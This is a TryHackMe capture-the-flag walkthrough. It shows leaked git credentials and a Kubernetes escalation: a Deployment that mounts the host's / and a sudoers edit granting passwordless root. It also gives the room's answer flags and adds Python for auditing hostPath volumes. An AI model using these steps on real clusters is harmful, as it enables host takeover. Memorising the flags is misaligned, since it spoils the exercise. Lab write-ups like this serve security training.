
[Frank & Herby Make an App] - TryHackMe - Walkthrough

A guide to the TryHackMe room [Frank & Herby Make an App]

Here we can see there's a web server running on port 31337. Browsing to this port confirms it's the port Question 1 is referring to. Next we continue to enumerate. The context clue that the answer to Question 2 starts with a '.' tells us we're looking for a hidden file or directory. Breaking out any decent brute force tool discovers the hidden file ".git-credentials", and we have the answer to Question 2.


The content of '.git-credentials' is 'http://frank:f%40an3-1s-E337%21%21@192.168.100.10/'. Note that part of the user frank's password is URL-encoded; decoding it reveals the username 'frank' and the password 'f@an3-1s-E337!!'.

These happen to be the SSH credentials as well, so the user flag is waiting for us immediately. Simply run cat user.txt.

Now it's time to pop root on this machine and get the hell out of here. If you notice, the entire theme was supposed to be Kubernetes, so eventually you'll find a Kubernetes deployment template in frank's folder: /home/frank/repos/dk-ml/test.yaml. As with Docker containers, we can use a Kubernetes container to mount the host's filesystem with root privileges and escalate ourselves. Here's how you'd modify this test.yaml template to do just that.

/home/frank/repos/ml-d/test.yaml:

apiVersion: apps/v1
kind: Deployment
metadata:
  name: exploit         
  labels:
    app: nginx
spec:
  replicas: 1
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
        - name: nginx
          volumeMounts:
          - name: local-stuff
            mountPath: /opt/root            
          image: localhost:32000/bsnginx
          ports:
            - containerPort: 80
          command:
          - "/bin/bash"
          - "-c"
          - "sleep 10000"
      volumes:
      - name: local-stuff
        hostPath:
          path: /
          type: Directory

Other than the obvious command override, note that we change the mount path here: the hostPath volume maps the host's / to /opt/root inside the container. Now run these commands:

Deploy a container using the template:
microk8s kubectl apply -f test.yaml

List the pods to make sure the pod has finished spinning up:
microk8s kubectl get pod

Once you see it, go ahead and jump into the pod:
microk8s kubectl exec -it <our_malicious_pod> -- /bin/bash

Now remember we mounted the host's hard drive at /opt/root, so jump on over to /opt/root/etc:
cd /opt/root/etc

We don't have the most common editors, so let's pollute the sudoers file for the frank user:
echo "frank    ALL=(ALL:ALL) NOPASSWD: ALL" >> sudoers

Now just exit out of the pod, back onto the host and run sudo su - and welcome to root, dear friends. Go ahead and read the root flag. Happy Hacking!
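Seen from the defender's side, the manifest above stands out for one reason: a hostPath volume that maps the node's / into a container with a writable mount. The following is an added example, not part of the original walkthrough, that audits workload objects (parsed from `kubectl get ... -o json` output) for such volumes; the function names, the severity labels and the list of sensitive prefixes are assumptions made for illustration.

```python
import posixpath

# Assumption: host paths treated as sensitive here; tune the list for your nodes.
SENSITIVE = ("/etc", "/root", "/home", "/proc", "/sys", "/var/run", "/var/lib/kubelet")

def pod_spec(obj):
    """Return the pod spec of a Pod, or of a workload that embeds a pod template."""
    spec = obj.get("spec") or {}
    if obj.get("kind") == "Pod":
        return spec
    if obj.get("kind") == "CronJob":
        spec = (spec.get("jobTemplate") or {}).get("spec") or {}
    return (spec.get("template") or {}).get("spec") or {}

def audit_hostpaths(obj):
    """List every hostPath volume in one object, with severity and its mounts."""
    spec, findings = pod_spec(obj), []
    containers = (spec.get("initContainers") or []) + (spec.get("containers") or [])
    for vol in spec.get("volumes") or []:
        if "hostPath" not in vol:
            continue
        # Normalise so "//", "/etc/" and "/var/../etc" cannot dodge the prefix match.
        raw = (vol["hostPath"] or {}).get("path") or "/"
        path = posixpath.normpath("/" + raw.lstrip("/"))
        mounts = [(c.get("name"), m.get("mountPath"), bool(m.get("readOnly")))
                  for c in containers for m in c.get("volumeMounts") or []
                  if m.get("name") == vol.get("name")]
        sensitive = path == "/" or any(
            path == p or path.startswith(p + "/") for p in SENSITIVE)
        writable = any(not read_only for _, _, read_only in mounts)
        severity = ("critical" if sensitive and writable
                    else "high" if sensitive else "low")
        findings.append({"workload": (obj.get("metadata") or {}).get("name"),
                         "volume": vol.get("name"), "hostPath": path,
                         "severity": severity, "mounts": mounts})
    return findings

# Constructed sample: the Deployment from this walkthrough in the JSON shape
# that `kubectl get deployment -o json` returns (trimmed to the relevant fields).
SAMPLE = {
    "kind": "Deployment", "metadata": {"name": "exploit"},
    "spec": {"template": {"spec": {
        "containers": [{"name": "nginx", "volumeMounts": [
            {"name": "local-stuff", "mountPath": "/opt/root"}]}],
        "volumes": [{"name": "local-stuff",
                     "hostPath": {"path": "/", "type": "Directory"}}]}}},
}

if __name__ == "__main__":
    for finding in audit_hostpaths(SAMPLE):
        print(finding)
```

To stop such a manifest from being admitted at all, the Baseline and Restricted Pod Security Standards forbid hostPath volumes, and the root cause on this box is that an ordinary user account can create workloads on the cluster.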

Task 1  Frank & Herb Make an App!

Make sure to wait 5 minutes after the machine starts up before starting recon.

Containers are really cool, but they have security considerations just like everything else.  Break into the box and then figure out how to get root access!

This box will require some research into how to use microk8s.

Our story so far....
Two developers are venturing into the world of Kubernetes. Little do these developers know that their lack of understanding in 'k8s', containers, and git has left their resources open to exploitation!

Answer the questions below
 
What port has a webpage frank was able to stand up? 
31337

What did frank leave exposed on the site? 

.git-credentials

What is the user.txt flag?

THM{F@nkth3T@nk}

What is the root.txt flag? 

THM{M1cr0K8s_13_FUN}
